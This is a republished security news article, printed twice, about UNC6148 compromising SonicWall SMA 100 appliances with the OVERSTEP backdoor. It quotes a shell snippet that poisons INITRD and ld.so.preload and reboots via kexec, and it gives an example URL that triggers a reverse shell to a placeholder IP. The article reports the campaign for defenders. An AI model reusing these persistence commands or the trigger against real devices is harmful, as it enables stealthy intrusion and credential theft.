SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
SonicWall’s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP.
The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials and one-time-password seeds, then pivots to full device compromise before exfiltrating data and preparing for ransomware deployment.
The attack chain begins with a burst of HTTP requests that ultimately hands the adversary a shell on the appliance—an action that should be impossible under normal conditions.
Google Threat Intelligence analysts noted that once the shell is active the intruder exports the device’s configuration, quietly injects malicious rules, and uploads a base64-encoded binary into the persistent /cf partition.
The binary is later copied to /usr/lib/libsamba-errors.so.6 and force-loaded on every process start via /etc/ld.so.preload, instantly granting the actor root-level reach across the appliance.
Investigators tied the initial foothold to one of several long-standing SMA vulnerabilities routinely traded in crime forums.
Table 1 summarises the most relevant bugs that provide either direct code-execution or credential theft paths exploited by related campaigns over the past three years.
CVEYearAuth?TypeKey ImpactPatch StatusCVE-2021-200382021NoMemory corruption RCEExecute arbitrary code unauthenticatedPatched July 2021CVE-2024-384752024NoPath traversalDump temp.db & persist.db to steal passwords and OTP seedsPatched Feb 2025CVE-2021-200352021YesCommand injectionRCE via /cgi-bin/sitecustomization handlerPatched April 2021CVE-2021-200392021YesCommand injectionRCE via /cgi-bin/viewcert handler linked to Abyss ransomwarePatched May 2021CVE-2025-328192025YesFile deletionResets built-in admin password to passwordPatched June 2025
The Shell commands executed by the dopasswords command depicts how OVERSTEP compresses credential databases into a web-reachable TAR archive, ensuring effortless download by the attacker.
Persistence Tactics: Hijacking the Boot Sequence
Once foothold is secured, UNC6148 cements persistence by rewriting the bootCurrentFirmware() routine inside /etc/rc.d/rc.fwboot.
The modified script mounts the device’s compressed initial RAM disk (INITRD), plants the trojanised library, and rewrites INITRD.GZ so the rogue code loads before any legitimate service.
A timestamp “touch” operation aligns file dates with the official kernel image, frustrating any quick metadata checks.
# Extract and poison INITRD gzip -d $fwLoc/INITRD.GZ mount -o loop $fwLoc/INITRD $fwLoc/zzz cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/ echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload umount $fwLoc/zzz && gzip $fwLoc/INITRD mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ /usr/local/sbin/kexec -l $fwLoc/BZIMAGE --append="`cat $fwLoc/LINUX.OPT`" /usr/local/sbin/kexec -e
When the appliance reboots, every dynamic binary—including the web server responsible for logging—links against the malicious library.
OVERSTEP hooks open*, readdir*, and write to hide its presence and parse inbound buffers for the strings dobackshell or dopasswords.
A single HTTP GET such as https://device/query?q=dobackshell,1.2.3.4,4444 triggers a reverse shell without touching disk logs, thanks to in-memory log tampering executed inside the hijacked write call.
The result is a resilient foothold: even fully patched appliances can be re-compromised as long as stolen credentials remain valid.
Google’s analysts urge defenders to image disks offline, rotate every password and OTP seed, and verify the absence of /etc/ld.so.preload; its very existence on SMA hardware is “tantamount to compromise”.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware
Author: Tushar Subhra DuttaSonicWall’s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP.
The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials and one-time-password seeds, then pivots to full device compromise before exfiltrating data and preparing for ransomware deployment.
The attack chain begins with a burst of HTTP requests that ultimately hands the adversary a shell on the appliance—an action that should be impossible under normal conditions.
Google Threat Intelligence analysts noted that once the shell is active the intruder exports the device’s configuration, quietly injects malicious rules, and uploads a base64-encoded binary into the persistent /cf partition.
The binary is later copied to /usr/lib/libsamba-errors.so.6 and force-loaded on every process start via /etc/ld.so.preload, instantly granting the actor root-level reach across the appliance.
Investigators tied the initial foothold to one of several long-standing SMA vulnerabilities routinely traded in crime forums.
Table 1 summarises the most relevant bugs that provide either direct code-execution or credential theft paths exploited by related campaigns over the past three years.
CVEYearAuth?TypeKey ImpactPatch StatusCVE-2021-200382021NoMemory corruption RCEExecute arbitrary code unauthenticatedPatched July 2021CVE-2024-384752024NoPath traversalDump temp.db & persist.db to steal passwords and OTP seedsPatched Feb 2025CVE-2021-200352021YesCommand injectionRCE via /cgi-bin/sitecustomization handlerPatched April 2021CVE-2021-200392021YesCommand injectionRCE via /cgi-bin/viewcert handler linked to Abyss ransomwarePatched May 2021CVE-2025-328192025YesFile deletionResets built-in admin password to passwordPatched June 2025
The Shell commands executed by the dopasswords command depicts how OVERSTEP compresses credential databases into a web-reachable TAR archive, ensuring effortless download by the attacker.
Persistence Tactics: Hijacking the Boot Sequence
Once foothold is secured, UNC6148 cements persistence by rewriting the bootCurrentFirmware() routine inside /etc/rc.d/rc.fwboot.
The modified script mounts the device’s compressed initial RAM disk (INITRD), plants the trojanised library, and rewrites INITRD.GZ so the rogue code loads before any legitimate service.
A timestamp “touch” operation aligns file dates with the official kernel image, frustrating any quick metadata checks.
# Extract and poison INITRD gzip -d $fwLoc/INITRD.GZ mount -o loop $fwLoc/INITRD $fwLoc/zzz cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/ echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload umount $fwLoc/zzz && gzip $fwLoc/INITRD mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ /usr/local/sbin/kexec -l $fwLoc/BZIMAGE --append="`cat $fwLoc/LINUX.OPT`" /usr/local/sbin/kexec -e
When the appliance reboots, every dynamic binary—including the web server responsible for logging—links against the malicious library.
OVERSTEP hooks open*, readdir*, and write to hide its presence and parse inbound buffers for the strings dobackshell or dopasswords.
A single HTTP GET such as https://device/query?q=dobackshell,1.2.3.4,4444 triggers a reverse shell without touching disk logs, thanks to in-memory log tampering executed inside the hijacked write call.
The result is a resilient foothold: even fully patched appliances can be re-compromised as long as stolen credentials remain valid.
Google’s analysts urge defenders to image disks offline, rotate every password and OTP seed, and verify the absence of /etc/ld.so.preload; its very existence on SMA hardware is “tantamount to compromise”.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
